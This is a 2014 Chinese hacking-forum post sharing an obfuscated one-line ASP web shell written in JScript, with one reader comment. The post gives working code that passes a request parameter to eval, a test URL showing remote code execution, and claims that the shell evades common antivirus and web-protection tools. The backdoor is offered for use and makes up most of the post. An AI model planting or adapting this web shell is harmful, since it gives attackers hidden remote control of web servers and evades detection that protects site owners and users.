ASP一句话也可以奇葩

2014-10-28 16:45:26 21 5442 1
大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。

但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>

代码简单说明:
第一句,声明脚本为javascript
第二句,自定义了个函数_,当传入为空时返回 eval 函数,当传入为真时返回 _ 接收的值; !-'' 是1(True)的变形 (和PHP变形一样有木有?)

代码原形: eval(Request('_')+'') ,注意 +'' 绝对不能忽略,这是把接来的值转为串,否则不能识别;

手连测试:
test.asp?_=Response.write%20(Date());  //输出当前时间



总结:

用javascript来写asp,语法就能像php一样各种奇葩,但是注意以下几点:

1. 虽然能免杀狗,盾和360,还是有关键eval,所以对于靠关键词查杀的简单脚本和工具就报出来了

2.由于用的javscript脚本,所以用一般的客户端,如菜刀,斧头。。都连不上,有待码农开发个客户端。。。

关于作者

新仙剑之鸣117篇文章1409篇回复

评论21次

要评论?请先  登录  或  注册
  • 1楼
    2014-10-28 16:52

    思路是不错,但是不可能专门为了这么一个变形写个客户端出来吧。